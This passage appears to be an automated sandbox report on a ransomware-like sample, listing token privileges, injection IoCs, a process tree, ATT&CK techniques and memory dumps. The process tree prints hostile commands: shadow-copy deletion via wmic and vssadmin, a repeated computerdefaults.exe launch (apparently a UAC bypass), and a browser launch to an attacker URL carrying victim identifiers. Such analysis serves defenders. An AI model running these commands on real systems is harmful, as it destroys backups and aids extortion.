Token: SeShutdownPrivilege	396	Process not Found
Token: SeCreatePagefilePrivilege	396	Process not Found
Token: SeShutdownPrivilege	396	Process not Found
Token: SeCreatePagefilePrivilege	396	Process not Found
Token: SeShutdownPrivilege	396	Process not Found
Token: SeCreatePagefilePrivilege	396	Process not Found
Token: SeShutdownPrivilege	396	Process not Found
Token: SeCreatePagefilePrivilege	396	Process not Found
Token: SeShutdownPrivilege	396	Process not Found
Token: SeCreatePagefilePrivilege	396	Process not Found
Token: SeShutdownPrivilege	396	Process not Found
Token: SeCreatePagefilePrivilege	396	Process not Found
Token: SeShutdownPrivilege	396	Process not Found
Token: SeCreatePagefilePrivilege	396	Process not Found
Token: SeShutdownPrivilege	396	Process not Found
Token: SeCreatePagefilePrivilege	396	Process not Found
Token: SeShutdownPrivilege	396	Process not Found
Token: SeCreatePagefilePrivilege	396	Process not Found
Token: SeShutdownPrivilege	396	Process not Found
Token: SeCreatePagefilePrivilege	396	Process not Found
Token: SeIncreaseQuotaPrivilege	1760	wmic.exe
Token: SeSecurityPrivilege	1760	wmic.exe
Token: SeTakeOwnershipPrivilege	1760	wmic.exe
Token: SeLoadDriverPrivilege	1760	wmic.exe
Token: SeSystemProfilePrivilege	1760	wmic.exe
Token: SeSystemtimePrivilege	1760	wmic.exe
Token: SeProfSingleProcessPrivilege	1760	wmic.exe
Token: SeIncBasePriorityPrivilege	1760	wmic.exe
Token: SeCreatePagefilePrivilege	1760	wmic.exe
Token: SeBackupPrivilege	1760	wmic.exe
Token: SeRestorePrivilege	1760	wmic.exe
Token: SeShutdownPrivilege	1760	wmic.exe
Token: SeDebugPrivilege	1760	wmic.exe
Token: SeSystemEnvironmentPrivilege	1760	wmic.exe
Token: SeRemoteShutdownPrivilege	1760	wmic.exe
Token: SeUndockPrivilege	1760	wmic.exe
Token: SeManageVolumePrivilege	1760	wmic.exe
Token: 33	1760	wmic.exe
Token: 34	1760	wmic.exe
Token: 35	1760	wmic.exe
Token: 36	1760	wmic.exe
Token: SeIncreaseQuotaPrivilege	1760	wmic.exe
Token: SeSecurityPrivilege	1760	wmic.exe
Token: SeTakeOwnershipPrivilege	1760	wmic.exe
Token: SeLoadDriverPrivilege	1760	wmic.exe
Token: SeSystemProfilePrivilege	1760	wmic.exe
Token: SeSystemtimePrivilege	1760	wmic.exe
Token: SeProfSingleProcessPrivilege	1760	wmic.exe
Token: SeIncBasePriorityPrivilege	1760	wmic.exe
Token: SeCreatePagefilePrivilege	1760	wmic.exe
Token: SeBackupPrivilege	1760	wmic.exe
Token: SeRestorePrivilege	1760	wmic.exe
Token: SeShutdownPrivilege	1760	wmic.exe
Token: SeDebugPrivilege	1760	wmic.exe
Token: SeSystemEnvironmentPrivilege	1760	wmic.exe
Token: SeRemoteShutdownPrivilege	1760	wmic.exe
Token: SeUndockPrivilege	1760	wmic.exe
Token: SeManageVolumePrivilege	1760	wmic.exe
Token: 33	1760	wmic.exe
Token: 34	1760	wmic.exe
Token: 35	1760	wmic.exe
Token: 36	1760	wmic.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
396	Process not Found
2892	MicrosoftEdge.exe
4184	MicrosoftEdgeCP.exe
4184	MicrosoftEdgeCP.exe

Suspicious use of UnmapMainImage 1 IoCs

pid	Process
396	Process not Found

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 2140 wrote to memory of 1432	2140	rundll32.exe	69
PID 2140 wrote to memory of 1432	2140	rundll32.exe	69
PID 2140 wrote to memory of 1756	2140	rundll32.exe	70
PID 2140 wrote to memory of 1756	2140	rundll32.exe	70
PID 2140 wrote to memory of 1760	2140	rundll32.exe	71
PID 2140 wrote to memory of 1760	2140	rundll32.exe	71
PID 2140 wrote to memory of 1904	2140	rundll32.exe	72
PID 2140 wrote to memory of 1904	2140	rundll32.exe	72
PID 2140 wrote to memory of 2168	2140	rundll32.exe	74
PID 2140 wrote to memory of 2168	2140	rundll32.exe	74
PID 1904 wrote to memory of 3712	1904	cmd.exe	78
PID 1904 wrote to memory of 3712	1904	cmd.exe	78
PID 2168 wrote to memory of 4472	2168	cmd.exe	79
PID 2168 wrote to memory of 4472	2168	cmd.exe	79
PID 4912 wrote to memory of 4540	4912	cmd.exe	89
PID 4912 wrote to memory of 4540	4912	cmd.exe	89
PID 4936 wrote to memory of 5112	4936	cmd.exe	90
PID 4936 wrote to memory of 5112	4936	cmd.exe	90
PID 4184 wrote to memory of 1508	4184	MicrosoftEdgeCP.exe	96
PID 4184 wrote to memory of 1508	4184	MicrosoftEdgeCP.exe	96
PID 4184 wrote to memory of 1508	4184	MicrosoftEdgeCP.exe	96
PID 4184 wrote to memory of 1508	4184	MicrosoftEdgeCP.exe	96
PID 4184 wrote to memory of 1508	4184	MicrosoftEdgeCP.exe	96
PID 4184 wrote to memory of 1508	4184	MicrosoftEdgeCP.exe	96

C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\tfhga.dll,#1
1⤵
- Modifies extensions of user files
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2140
- C:\Windows\system32\notepad.exe
  notepad.exe C:\Users\Public\readme.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:1432
- C:\Windows\system32\cmd.exe
  cmd /c "start http://1094f0c0225852c0egqzhlie.dearbet.sbs/gqzhlie^&1^&49975334^&95^&355^&2215063"
  2⤵
  - Checks computer location settings
  PID:1756
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1760
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1904
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:3712
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2168
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:4472

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4936
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5112

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:4944

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4912
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4540

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:5108

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2892

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:1360

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4184

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
PID:1508

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:4016

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File Deletion

T1107

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2140-124-0x000001B5FF650000-0x000001B5FF651000-memory.dmp

Filesize
4KB

Download
memory/2140-131-0x000001B583410000-0x000001B583415000-memory.dmp

Filesize
20KB

Download
memory/2140-125-0x000001B5FF660000-0x000001B5FF661000-memory.dmp

Filesize
4KB

Download
memory/2140-126-0x000001B5FF6A0000-0x000001B5FF6A1000-memory.dmp

Filesize
4KB

Download
memory/2140-128-0x000001B5FF6C0000-0x000001B5FF6C1000-memory.dmp

Filesize
4KB

Download
memory/2140-127-0x000001B5FF6B0000-0x000001B5FF6B1000-memory.dmp

Filesize
4KB

Download
memory/2140-130-0x000001B583400000-0x000001B583401000-memory.dmp

Filesize
4KB

Download
memory/2140-123-0x000001B5FF640000-0x000001B5FF641000-memory.dmp

Filesize
4KB

Download
memory/2140-129-0x000001B5FFE00000-0x000001B5FFE01000-memory.dmp

Filesize
4KB

Download
memory/2140-140-0x000001B584F30000-0x000001B584F31000-memory.dmp

Filesize
4KB

Download
memory/2140-122-0x000001B5FF630000-0x000001B5FF631000-memory.dmp

Filesize
4KB

Download
memory/2140-120-0x000001B5FF610000-0x000001B5FF611000-memory.dmp

Filesize
4KB

Download
memory/2140-121-0x000001B5FF620000-0x000001B5FF621000-memory.dmp

Filesize
4KB

Download
memory/2140-119-0x000001B5FF600000-0x000001B5FF601000-memory.dmp

Filesize
4KB

Download
memory/2140-118-0x000001B5FF6E0000-0x000001B5FFDF9000-memory.dmp

Filesize
7.1MB

Download
memory/3696-147-0x000001661B4E0000-0x000001661B4E8000-memory.dmp

Filesize
32KB

Download
memory/3696-148-0x000001661B4D0000-0x000001661B4D1000-memory.dmp

Filesize
4KB

Download
memory/3696-154-0x000001661B7E0000-0x000001661B7E1000-memory.dmp

Filesize
4KB

Download
memory/3696-153-0x000001661B800000-0x000001661B808000-memory.dmp

Filesize
32KB

Download
memory/3696-143-0x000001661AFD0000-0x000001661AFD8000-memory.dmp

Filesize
32KB

Download
memory/3696-144-0x000001661AFB0000-0x000001661AFB1000-memory.dmp

Filesize
4KB

Download
memory/3696-152-0x000001661B750000-0x000001661B758000-memory.dmp

Filesize
32KB

Download
memory/3696-145-0x000001661AFB0000-0x000001661AFB8000-memory.dmp

Filesize
32KB

Download
memory/3696-151-0x000001661AFB0000-0x000001661AFB8000-memory.dmp

Filesize
32KB

Download
memory/3696-146-0x000001661B4D0000-0x000001661B4D8000-memory.dmp

Filesize
32KB

Download
memory/3696-149-0x000001661B390000-0x000001661B398000-memory.dmp

Filesize
32KB

Download
memory/3696-150-0x000001661B420000-0x000001661B428000-memory.dmp

Filesize
32KB

Download